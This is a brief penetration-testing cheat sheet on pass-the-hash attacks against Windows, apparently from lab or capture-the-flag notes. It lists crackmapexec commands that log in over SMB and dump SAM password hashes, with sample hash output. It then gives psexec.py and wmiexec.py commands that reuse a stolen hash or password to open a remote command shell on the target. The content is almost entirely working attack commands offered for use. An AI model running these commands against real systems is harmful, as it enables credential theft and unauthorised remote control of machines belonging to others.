Pass The Hash

Windows

If you have a user with max privileges, you could retrieve SAM hashes (users passwords):
crackmapexec smb 10.10.10.10 -u 'USERNAME' -p 'PASSWORD'
...
SMB 10.10.10.10 445 LOCAL [+] local\USERNAME:PASSWORD (Pwn3d!)
So you can use crackmapexec too:
crackmapexec smb 10.10.10.10 -u 'USERNAME' -p 'PASSWORD' --sam
...Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
...Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
...USERNAME:1000:aad3b435b51404eeaad3b435b51404ee:c1741694e7586153e6f4f49463be8ec5:::
...user3$:1002:aad3b435b51404eeaad3b435b51404ee:ed3c759dafa8d554e038c2152aa67cb3:::
...user1:1003:aad3b435b51404eeaad3b435b51404ee:3a7ac3205a1b5d1fcd63fb5d509a6d67:::
With those hashes we can obtain a CMD using several tools:
psexec.py [email protected] -hashes aad3b435b51404eeaad3b435b51404ee:c1741694e7586153e6f4f49463be8ec5
wmiexec.py [email protected] -hashes aad3b435b51404eeaad3b435b51404ee:c1741694e7586153e6f4f49463be8ec5
Or simply with credentials:
psexec.py USERNAME:[email protected]
wmiexec.py USERNAME:[email protected]